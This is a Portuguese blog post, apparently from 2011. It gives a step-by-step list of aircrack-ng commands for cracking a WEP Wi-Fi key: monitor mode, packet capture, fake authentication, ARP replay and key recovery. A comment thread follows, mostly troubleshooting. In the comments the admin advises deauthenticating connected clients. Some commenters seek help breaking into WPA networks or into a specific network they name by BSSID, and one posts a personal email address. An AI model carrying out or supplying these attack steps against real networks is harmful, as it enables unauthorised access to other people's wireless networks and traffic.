Video demonstrativo de como quebrar uma chave WEP (nesse caso 40-bits, mas funcionaria para 104-bits).
Comandos:
0:42 apt-get install aircrack-ng
1:06 iwconfig
1:22 airmon-ng start wlan0
1:30 ifconfig
1:35 ifconfig mon0
1:43 airodump-ng mon0
2:05 airodump-ng –channel 6 –bssid XX:XX:XX:XX:XX:XX -w wep1 mon0
2:33 sudo su
2:43 ifconfig wlan0
2:50 aireplay-ng -1 0 -e YYYY -a XX:XX:XX:XX:XX:XX -h ZZ:ZZ:ZZ:ZZ:ZZ:ZZ mon0
3:17 aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h ZZ:ZZ:ZZ:ZZ:ZZ:ZZ mon0
4:04 sudo su
4:13 aireplay-ng -1 0 -e YYYY -a XX:XX:XX:XX:XX:XX -h ZZ:ZZ:ZZ:ZZ:ZZ:ZZ mon0
4:26 ls -lah wep1-01.cap
4:35 aircrack-ng -b XX:XX:XX:XX:XX:XX wep1-01.cap
XX:XX:XX:XX:XX:XX = BSSID da rede alvo (obtido pelo airodump-ng)
YYYY = nome da rede alvo (obtido pelo airodump-ng)
ZZ:ZZ:ZZ:ZZ:ZZ:ZZ:ZZ = MAC address da interface de rede que usamos para injetar os pacotes (nesse caso: wlan0)
UPDATE (23/10/2011):
aireplay-ng: Wouldn’t false authenticate OR deauth = mon0 is on channel -1, but the AP uses channel X
Se voce estiver tendo problema com “channel -1″, de uma olhada nesse tutorial:
http://www.hack.net.br/blog/hacking/aircrack-ng-mon0-is-on-channel-1-but-the-ap-uses-channel-x/
No related posts.
muito bom o tutorial… simples dmais… só quem for realmente “crú” no linux que ñ vai entender bem…
Amigo, estou usando o ubunto portable e quando digito iwconfig meu adaptador RTL8187 Wireless 802.11b/g 54Mbps USB 2.0 não é reconhecido, porque? essa placa de rede wireless não da pra fazer?
Amigo, acho q tive o mesmo problema que voce. no momento ao qual se da o iwconfig da placa e la se a mon0 no meu tbm deu erro soment substitui o mon0 pela wlan0 e segue adiante
tutorialotimo mesmo mas nao funcionou comigo se puder me ajudar te pago pra isso vlw
Amigo, parabéns pelo post. Estou empacado na seguinte situação:
root@toor:/home/toor# aireplay-ng -1 0 -e casa -a 00:1E:58:0C:3D:72 -h 00:08:54:89:31:c8 mon0
14:59:10 Waiting for beacon frame (BSSID: 00:1E:58:0C:3D:72) on channel -1
14:59:10 mon0 is on channel -1, but the AP uses channel 6
root@toor:/home/toor#
Como mudo a mon0 pro canal 6??? Já tentei várias maneiras, pesquisei, mas não acho solução.
Abraço.
blz, estou com o mesmo problema que o seu, gostaria de saber se vc descobriu algo?
root@toor:/home/toor# aireplay-ng -1 0 -e casa -a 00:1E:58:0C:3D:72 -h 00:08:54:89:31:c8 mon0
14:59:10 Waiting for beacon frame (BSSID: 00:1E:58:0C:3D:72) on channel -1
14:59:10 mon0 is on channel -1, but the AP uses channel 6
root@toor:/home/toor#
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-10-16.tar.bz2
tar -jxf compat-wireless-2010-10-16.tar.bz2
cd compat-wireless-2010-10-16
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
gedit scripts/update-initramfs
(vai abrir um arquivo de configuracao)
#*** PROCURE NA LINHA 13: KLIB=/lib/modules/2.6.31-wl/build
#*** TROUE POR: KLIB=/lib/modules/$(uname -r)/build
(feche e salve o arquivo de configuracao)
make
sudo make install
sudo make unload
sudo reboot
Espere e reinciar e tudo ok agora!
fonte: http://www.centraldolinux.org/correcao-para-o-problema-que-fixa-o-canal-da-wireless-em-1/
Essa aplicação de patchs não funciona para o kernel 2.6.38.
Recomendo instalar o kernel 2.6.34 daqui: http://kernel.ubuntu.com/~kernel-ppa/mainline/v2.6.34.2-maverick/ e mandar ver.
Mais simples e rápido.
Criei um tutorial sobre como resolver esse problema:
http://www.hack.net.br/blog/hacking/aircrack-ng-mon0-is-on-channel-1-but-the-ap-uses-channel-x/
Espero que ajude!
estou com o mesmo problema do cara ai de cima…
Criei um tutorial sobre como resolver esse problema:
http://www.hack.net.br/blog/hacking/aircrack-ng-mon0-is-on-channel-1-but-the-ap-uses-channel-x/
Espero que ajude! (2)
Eu também ><
Boa noite Allan,
Fiz tudo exatamente como está no vídeo, porém, quando eu esse comando na aba 2 (aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h ZZ:ZZ:ZZ:ZZ:ZZ:ZZ mon0) e depois vou para a aba 3 e peço para criar uma conexão para poder gerar o pacote arp, usando esse comando (aireplay-ng -1 0 -e YYYY -a XX:XX:XX:XX:XX:XX -h ZZ:ZZ:ZZ:ZZ:ZZ:ZZ mon0) e em seguida volto na aba 2, o aireplay não começa a enviar pacotes, ele simplesmente continua no 0 packets, enquanto no teu video ele começa a enviar.
Saberias me dizer o que pode estar acontecendo de errado?
Obrigado!
Diego, dependendo do tipo de autenticacao requerida no AP, pode ser que o fake auth nao funcione, que parece ser seu caso. Tente trocar o “-1 0″ do segundo comando para: “-0 10″ para tentar de-autenticar alguma estacao conectada, quando essa estacao tentar conectar novamente voce tera seu pacote ARP.
Se nada disso funcionar, recomendo voce deixar o aireplay -3 rodando por algumas horas enquanto tiver gente conectada no AP alvo, uma hora um pacote ARP ira passar.
Abrs.
Toor,
na aba 1, quando tu digita o seguinte comando: airodump-ng –channel 6 –bssid XX:XX:XX:XX:XX:XX -w wep1 mon0, tu está deixando a placa no canal 6, e portanto, quando for trabalhar com ela por meio dos outros aplicativos (aireplay, airmon, etc) ele vai acusar que sua placa se encontra em outro canal, procure verificar esse comando que eu citei acima para ver em que canal ela está ouvindo.
Att,
Diego
Obrigado Admin!
Vou tentar as recomendações.
Amigo, estou usando o ubunto portable e quando digito iwconfig meu adaptador RTL8187 Wireless 802.11b/g 54Mbps USB 2.0 não é reconhecido, porque? essa placa de rede wireless não da pra fazer?
tbm estou com esse problema
14:59:10 mon0 is on channel -1, but the AP uses channel 6
alguem poderia me ajudar?
caramba ta todo mundo com o mesmo problema
14:59:10 mon0 is on channel -1, but the AP uses channel 6
bem q o adm ou o cara q fez o video poderia pelo menos ter a coragem de falar ” EU NAO SEI”!!!!!
aff
pra variar to com o mesmo problema
Criei um tutorial sobre como resolver esse problema:
http://www.hack.net.br/blog/hacking/aircrack-ng-mon0-is-on-channel-1-but-the-ap-uses-channel-x/
Espero que ajude! (3)
Erro:
mon0 is on channel -1, but the AP uses channel 6
Aí galera que tá com o problema 14:59:10 mon0 is on channel -1, but the AP uses channel 6 o problema é simples de resolver. A sua placa wireless está procurando em diversos canais MAC’s e redes disponíveis então esse erro fica dando pq na hora em que vc dá o comando o canal da placa é diferente então dá o erro “14:59:10 mon0 is on channel -1, but the AP uses channel 6″. Para corrigir esse erro basta apenas vc apertar o botão seta pra cima e dar enter. Como sua placa está procurando rede por rede então talvez dê esse erro de novo aí vc aperta pra cima de novo e dá enter até que o canal requerido seja o canal da placa. Dpois tudo ocorrerá de acordo com o vídeo.
isso não deu resultados não
Gostaria de pedir ao kra que fez o vídeo que ele ensine a hackear redes WAP e WAP2.
Ola em meu note tenho uma placa com o chipset RTL 8191 teria como colocar ela em modo monitor?
achei esse patch, ainda nao testei, mas …
http://www.centraldolinux.org/correcao-para-o-problema-que-fixa-o-canal-da-wireless-em-1/
Infelizmente nao fucionou
Aviso aos navegantes, comecei com ubuntu 11 e duas placas. Ambas com problema de canal -1.
Tentei varias coisas, mas o que realmente funcionou foi rodar o backtrack 4 e com as mesmas placas nao ocorreu o problema do channel -1. Fiz questao de rodar todo o processo uma vez com cada placa e deu certo.
O problema era o tempo todo meu Ubuntu. Boa sorte a todos
Eu estou com o mesmo problema, esse patch que vc fala ai, eu fiz o passo a passo e o que resultou foi que minha placa wireless não esta mas pegando, já rodei a trás de solução e nada. o que vou fazer agora é instalar o ubuntu novamente do zero. você instalaou o backtrack 4 no ubuntu 11 e funcionou sem stress? blz.
Valeu!!
Criei um tutorial sobre como resolver esse problema:
http://www.hack.net.br/blog/hacking/aircrack-ng-mon0-is-on-channel-1-but-the-ap-uses-channel-x/
Espero que ajude! (4)
Gente, não vai dar certo, parece que todo mundo usa ubuntu ae, parem de perder tempo, usem backtrack…
Blz, deu tudo certo, mas agora como que usa essa KEY [ BE:AC:E3:23:45] ?
Amigo estou com esse problema saberia informar o porque do erro
quando tento o comando :
airmon-ng start eth1
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
735 avahi-daemon
736 avahi-daemon
737 NetworkManager
870 wpa_supplicant
1541 dhclient
Process with PID 1541 (dhclient) is running on interface eth1
já tentei dar kill nos processos mesmo assim ele não mata
Boa tarde Allan, eu utilizo a mesma placa que você:
root@Vitor-Linux:/media/WUSB11/Drivers# lsusb
Bus 003 Device 003: ID 13b1:000b Linksys WUSB11 v4.0 802.11b Adapter
Mas a minha não entra no modo monitor:
root@Vitor-Linux:/media/WUSB11/Drivers# airmon-ng start wlan1 1
Process with PID 5753 (dhclient) is running on interface wlan1
Interface Chipset Driver
wlan0 RTL8187 rtl8187 – [phy0]
wlan1 Unknown ndiswrapper (MONITOR MODE NOT SUPPORTED)
Você sabe me informar oq pq ? eu instalei com o ndiswrapper. Aguardo um retorno!
Victor,
acredito que o ndiswrapper nao vai dar suporte a monitor mode.
Qual Linux voce esta usando? Tente a ultima versão do Backtrack, funcionou aqui perfeitamente, sem precisar de nenhum driver extra.
Abrs.
Olá estou tentando fazer isso na minha rede, mas quando dou o airodump-ng mon0 e o airodump-ng -c X –bssid zz:zz:zz:zz:zz:zz:zz -w wep1 mon0 o data sempre fica 0, você sabe o que eu posso fazer pra mudar isso??? O data só muda se faço isso já conectado na minha rede….
Falou pessoal obrigado!
Anderson,
eh nessa hora que voce precisa do aireplay-ng pra gerar trafego na rede para o airodump-ng capturar.
Voce chegou a rodar o aireplay-ng? O que aconteceu?
Abrs.
A minha internet sempre cai quando eu envio o comando [ACK] pq?
OBS: O tutorial para retirar o erro airodump-ng: Fixed channel to -1 = fixed channel mon0: -1 … FUNCIONOU!
To tentando quebrar a senha e encontro isso como resposta.
Aircrack-ng 1.0
Aircrack-ng 1.0
[00:00:01] Tested 524289 keys (got 14 IVs)
Aircrack-ng 1.0
KB depth [00:00:02] Tested 917505 keys (got 14 IVs)
0 0/ 1 10( 512) 0D( 256Aircrack-ng 1.0256) 47( 256)
KB depth [00:00:04] Tested 1638401 keys (got 14 IVs)
0 0/ 1 10( 512) 0D( 256Aircrack-ng 1.0256) 47( 256)
KB depth [00:00:04] Tested 1638401 keys (got 14 IVs)
0 0/ 1 10( 512) 0D( 256Aircrack-ng 1.0256) 47( 256)
KB depth [00:00:19] Tested 7405569 keys (got 14 IVs)
0 0/ 1 10( 512) 0D( 256Aircrack-ng 1.0256) 47( 256)
KB depth [00:00:19] Tested 7405569 keys (got 14 IVs)
0 0/ 1 10( 512) 0D( 256) 36( 256) 3E( 256) 47( 256)
KB depth [00:00:20] Tested 149353 keys (got 14 IVs)
0 0/ 1 10( 512) 0D( 256) 36( 256) 3E( 256) 47( 256)
KB depth byte(vote)1( 256) 49( 256) 50( 256) 55( 256)
0 0/ 9 10( 512) 0D( 256) 36( 256) 3E( 256) 47( 256)
1 13/ 14 69( 256) 00( 0) 01( 0) 02( 0) 03( 0)
2 13/ 14 DC( 256) 01( 0) 02( 0) 03( 0) 04( 0)
3 13/ 3 F9( 256) 00( 0) 01( 0) 02( 0) 03( 0)
4 13/ 4 F4( 256) 00( 0) 02( 0) 03( 0) 04( 0)
Failed. Next try with 5000 IVs.
Nesses números já esta a chave??? Ou tem algum erro??
Obrigado, consegui! Não não consegui acelerar os pacotes.
tipow, aqui no meu ubuntu 11.10 quando eu coloco “airmon -ng start wlan0 ” aparece no fim o seguinte: Interface wlan0, Chipset Unknown, Driver wl (monitor mode enabled)
por que Unknown, o que eu faço?
Mano é o seguinte estou usando meu not, faço passo a passo com esta no seu video, a placa entra em modo de monitoramento mas não cria uma noca interface, ja tentei de tudo mas o não sei o que fazer vocce pode me ajudar???
Veja como fica no meu:
root@kadu:~# airmon-ng start eth1
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
790 NetworkManager
793 avahi-daemon
795 avahi-daemon
897 wpa_supplicant
Interface Chipset Driver
eth1 Unknown wl (monitor mode enabled)
usando WEP, quando tento acelerar os pacotes, o airodump para de funcionar.
Bom dia,
Estou usando o S.O Backtrack 5 R1, executo o konsole no modo root (sudo su), inicio o modo de monitoramento (airmon-ng start wlan0), porém não consigo visualizar a interface mon0 (ifconfig mon0). aparece o seguinte erro: mon0: error fetching interface information: Device not found
as informações sobre minha placa de rede são:
root@bt:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:03:0d:f9:aa:80
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:52197 errors:0 dropped:0 overruns:0 frame:0
TX packets:42165 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:60461264 (60.4 MB) TX bytes:5660025 (5.6 MB)
Interrupt:41 Base address:0xc000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:276 errors:0 dropped:0 overruns:0 frame:0
TX packets:276 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:19073 (19.0 KB) TX bytes:19073 (19.0 KB)
wlan0 Link encap:Ethernet HWaddr 70:f1:a1:70:b4:4a
inet addr:192.168.1.3 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::72f1:a1ff:fe70:b44a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:132749 errors:2143 dropped:188136 overruns:0 frame:0
TX packets:87361 errors:77 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:165675854 (165.6 MB) TX bytes:13043848 (13.0 MB)
Interrupt:18 Memory:f8330000-f8330100
sou um novo estudante em linux, se possível me ajude. desde já, grato!
Qual é o “certo macete pra acelerar esse processo”?
Boas, eu nao tenho o linux por isso gostava de uma ajuda se possivel.
eu tenho esta net Meo-38012B que tem o seguinte BSSID: 58:98:35:38:01:2B. contudo apesar de todos os meus esorços ainda nao descobri a pass.
ALGUEM ME PODERIA AJUDAR
Obrigado
luisltteixeira@hotmail.com